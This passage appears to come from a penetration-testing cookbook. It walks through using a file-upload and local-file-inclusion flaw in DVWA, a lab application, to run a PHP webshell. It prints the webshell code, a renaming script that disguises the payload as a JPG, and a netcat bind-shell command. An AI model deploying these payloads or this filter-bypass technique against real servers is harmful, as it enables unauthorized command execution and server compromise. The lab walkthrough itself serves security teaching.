As we saw in Chapter 4, Finding Vulnerabilities, file inclusion vulnerabilities occur when developers use poorly validated input to generate file paths and use those paths to include source code files. Modern versions of server-side languages, such as PHP since 5.2.0, have by default disabled the ability to include remote files, so it has been less common to find an RFI since 2011.
In this recipe, we will first upload a couple of malicious files, one of them is a webshell (a web page capable of executing system commands in the server), and then execute them using local file inclusions.
We will use Damn Vulnerable Web Application (DVWA) in the vulnerable_vm for this recipe and will have it with a medium level of security, so let's set it up:
http://192.168.56.102/dvwa
.We will upload some files to the server, but you need to remember where they are stored, in order to be able to call them again; so, go to Upload in DVWA and upload any JPG image. If it's successful, it will say that the file was uploaded to ../../hackable/uploads/
. Now we know the relative path where it saves the uploaded files; that's enough for this recipe.
We also need to have our files ready; so let's create a new text file with the following content:
<? system($_GET['cmd']); echo '<form method="post" action="../../hackable/uploads/webshell.php"><input type="text" name="cmd"/></form>'; ?>
Save it as webshell.php
. We will need another file, create rename.php
and put the following code in it:
<? system('mv ../../hackable/uploads/webshell.jpg ../../hackable/uploads/webshell.php'); ?>
This file will take a specific image file (webshell.jpg
) and rename it for webshell.php
.
webshell.php
, as shown:So, there is a validation of what we can upload and what we can't. This means that we will need to upload an image file or more precisely, an image file with a .jpg
, .gif
, or .png
extension. This is why we need the renamer script to return the .php
extension to the original file and then be able to execute it.
cp rename.php rename.jpg cp webshell.php webshell.jpg
rename.jpg
. Go to the File Inclusion section and exploit the vulnerability including ../../hackable/uploads/rename.jpg
.We don't have any output for the execution of this file, we will need to assume that webshell.jpg
is now named webshell.php
.
../../hackable/uploads/webshell.php
, let's try it:/sbin/ifconfig
and hit Enter:And it worked! As seen in the image, the server has the 192.168.56.102 IP address. Now, we can execute commands in the server by typing them in the textbox or setting a different value for the cmd
parameter.
The first test that we did when we uploaded a valid JPG was meant to discover the path where the uploaded files are saved; so we can use this path in rename.php
and in the action
field of the form.
It is necessary to use a rename script for two reasons: first, the upload page only allows JPG files, so our scripts will need to have that extension; and second, we will need to call our webshell with parameters (the commands to execute); we cannot use parameters when calling a JPG image from a web server.
The system()
function of PHP is the core of the attack; what it does is, it invokes a system command and displays its output. This allows us to rename the webshell file from .jpg
to .php
and to execute the commands we specify as GET parameters.
Once we upload and execute the server-side code, there are a huge number of options that we can take to compromise the server; for example, the following command is what we call a bind shell:
nc -lp 12345 -e /bin/bash
It will open the TCP port 12345 in the server and listen for a connection, when the connection succeeds, it will execute /bin/bash
and receive its input and send its output through the network to the connected host (the attacking machine).
It is also possible to make the server download some malicious program; for example, a privilege escalation exploit and execute it to become a user with more privileges.
3.129.218.45